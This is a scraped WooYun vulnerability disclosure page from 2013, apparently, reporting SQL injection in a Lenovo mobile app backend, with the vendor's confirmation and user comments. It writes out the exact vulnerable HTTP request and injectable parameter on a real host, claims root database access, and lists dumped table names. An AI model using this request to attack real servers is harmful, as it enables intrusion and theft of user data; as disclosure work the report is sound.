APP终结者6#联想商城App云端主站Sql注入殃及其他主站多库

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-043972

漏洞标题：APP终结者6#联想商城App云端主站Sql注入殃及其他主站多库

漏洞作者： zzR

提交时间：2013-11-25 10:17

修复时间：2014-01-09 10:18

公开时间：2014-01-09 10:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-11-25：细节已通知厂商并且等待厂商处理中
2013-11-25：厂商已经确认，细节仅向厂商公开
2013-12-05：细节向核心白帽子及相关领域专家公开
2013-12-15：细节向普通白帽子公开
2013-12-25：细节向实习白帽子公开
2014-01-09：细节向公众公开

简要描述：

天气又凉了

详细说明：

app名称：联想商城、thinkcare、联想内购等

GET /leclient/LenovoPackage/repairuserinfocreate.php?appname=%E7%BD%91%E4%B8%8A%E6%8A%A5%E4%BF%AE&realname=&sn=11111111111111&type=add&temptime= HTTP/1.1
Host: wap.lenovo.com.cn
Proxy-Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: zh-cn
Connection: keep-alive
User-Agent: ThinkCare/15 CFNetwork/672.0.8 Darwin/14.0.0

其中参数sn存在sql注入

漏洞证明：

root用户dba权限

-多库

乐享家 3g 等等数据库都在，还有一个bugsys 是神马？！！
current db

Database: lenovo3g
[32 tables]
+----------------------+
| administrator        |
| client_log           |
| client_log_copy      |
| clientvisitlog       |
| comments             |
| doc                  |
| evaluation           |
| le_adminuserinfo     |
| le_content           |
| notice               |
| product_line         |
| repairuserinfo       |
| stationcomments      |
| stationcomments001   |
| stationcomments_copy |
| t_dcounter           |
| t_driverservice      |
| t_duser              |
| t_station            |
| t_station_copy1      |
| t_station_copy_copy  |
| t_station_new        |
| t_station_tzj        |
| tags                 |
| troubles_log         |
| troubles_step        |
| trouqles             |
| trouqles_category    |
| userinfo             |
| wsi_station          |
| wx_location_desc     |
| wx_location_desc_bak |
+----------------------+

未深入……

修复方案：

扩大防线

版权声明：转载请注明来源 zzR@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2013-11-25 16:42

厂商回复：

感谢您对联想安全做出的贡献！我们将立即评估与修复相关漏洞

漏洞评价：

2013-11-25 10:32 | 小川 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

@zzR 洞主，别自己一个人爽了，快公布技术细节，让我们也撸一下吧
2013-11-25 11:19 | zzR ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1：5 无限量收 [平台担保])

@小川这个看标题就能看出来，就是抓包app的请求，然后弄他啊
2013-11-25 14:07 | 一灯大师 ( 普通白帽子 | Rank:140 漏洞数:28 | 一盏灯，也能让世界安全)

@zzR 别这样
2013-11-25 16:44 | zzR ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1：5 无限量收 [平台担保])

@一灯大师是不是觉得言简意赅，一针见血，饱含激情！
2013-11-25 17:57 | 一灯大师 ( 普通白帽子 | Rank:140 漏洞数:28 | 一盏灯，也能让世界安全)

@zzR 注意节奏
2014-01-09 10:31 | x1aoh4i ( 普通白帽子 | Rank:403 漏洞数:62 )

你这么屌丝贵夫之道么

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-043972

漏洞标题：APP终结者6#联想商城App云端主站Sql注入殃及其他主站多库

相关厂商：联想

漏洞作者： zzR

提交时间：2013-11-25 10:17

修复时间：2014-01-09 10:18

公开时间：2014-01-09 10:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 zzR@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-043972

漏洞标题：APP终结者6#联想商城App云端主站Sql注入殃及其他主站多库

相关厂商：联想

漏洞作者： zzR

提交时间：2013-11-25 10:17

修复时间：2014-01-09 10:18

公开时间：2014-01-09 10:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-043972"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 zzR@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：